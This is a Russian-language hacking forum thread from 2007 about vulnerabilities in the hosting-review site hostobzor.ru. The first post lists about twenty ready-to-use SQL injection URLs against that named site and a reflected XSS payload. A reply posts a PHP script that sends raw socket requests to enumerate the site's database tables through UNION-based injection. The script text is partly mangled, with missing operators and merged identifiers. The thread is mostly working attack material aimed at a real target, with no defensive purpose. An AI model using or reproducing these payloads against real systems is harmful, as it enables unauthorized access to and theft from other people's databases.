Уязвимочти hostobzor.ru ( Дубль 2 )

Обсуждение в разделе «Уязвимости», начал(-а) Sharky, 13.01.2007.

  1. Sharky

    Sharky Elder - Старейшина

    Регистрация:
    1.05.2006
    Сообщения:
    749
    Одобрения:
    312
    Репутация:
    46
    Вот опять вам на обзор :
    http://www.hostobzor.ru/db/news.php?id=666
    http://www.hostobzor.ru/db/resell.php?pid=-1+UNION+SELECT+CHAR(48,49,50,51,52,53,54,55,56,57,58,59,60),2,999/*
    http://www.hostobzor.ru/db/list_news_prov.php?pid=12%27
    http://www.hostobzor.ru/db/domen.php?pid=-372+UNION+SELECT+1,2,3/*
    http://www.hostobzor.ru/db/vds.php?pid=-1+union+select+1,2,3/*
    http://www.hostobzor.ru/db/vds.php?pid=-1%27
    http://www.hostobzor.ru/db/hosting.php?pid=-1%27
    http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
    http://www.hostobzor.ru/db/resell.php?pid=266%27
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=611%27
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153%27&id=611
    http://www.hostobzor.ru/list_sites/index.php?offset=120%27&poffset=3
    http://www.hostobzor.ru/db/hosting_d.php?stat=1&pid=153&id=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23/*
    http://www.hostobzor.ru/db/domen.php?pid=-1%27
    http://www.hostobzor.ru/db/adm_op.php
    http://www.hostobzor.ru/db/hosting.php?pid=392+and(1=3)+UNION+SELECT+1,2,3/*
    Вот опять та же xss-ка
    http://hostobzor.ru/db/list_col.php?dc=%3Cscript%3Ealert(666)%3C/script%3E

    Если не жалко дайте +
     
    Это одобряют 3 пользоветелей.
  2. Spyder

    Spyder Elder - Старейшина

    Регистрация:
    9.10.2006
    Сообщения:
    1 431
    Одобрения:
    1 208
    Репутация:
    475
    отпостил аж в двух темах =)
    поставлю тебе +
     
  3. Ded.MCz

    Ded.MCz Member

    Регистрация:
    16.01.2006
    Сообщения:
    23
    Одобрения:
    19
    Репутация:
    36
    хэк

    PHP:
    <?
    echo 
    "<pre>";
    //http://www.hostobzor.ru/db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+limit+90,1/*
    for($i=0;$i<90;$i++)
    {
    $port 80;
    $address gethostbyname ('www.hostobzor.ru');
    $socket socket_create (AF_INETSOCK_STREAMSOL_TCP);
    socket_connect($socket$address$port);
    socket_write($socket"GET /db/vds.php?pid=-1+UNION+SELECT+AES_DECRYPT(AES_ENCRYPT(TABLE_NAME,0x71),0x71),1,22+from+INFORMATION_SCHEMA.TABLES+limit+$i,1/* HTTP/1.0\n\n");
    $result "";
    $result=socket_read($socket455);//340
    $result=substr_replace($resultNULL0315);//303
    $patern "#<[\s]*title[\s]*>([^<]*)<[\s]*/title[\s]*>#i";
    if(
    preg_match($patern$result$rez)) echo "\n".str_replace(" - виртуальный выделенный сервер | Хостинг Обзор - эпицентр русскоязычного хостинга"null$rez[1]);
    else echo 
    "\n"."траблы с ID $i";
    socket_close ($socket);
    }
    echo 
    "\n</pre>";
    //copyright by lamarez))
    ?>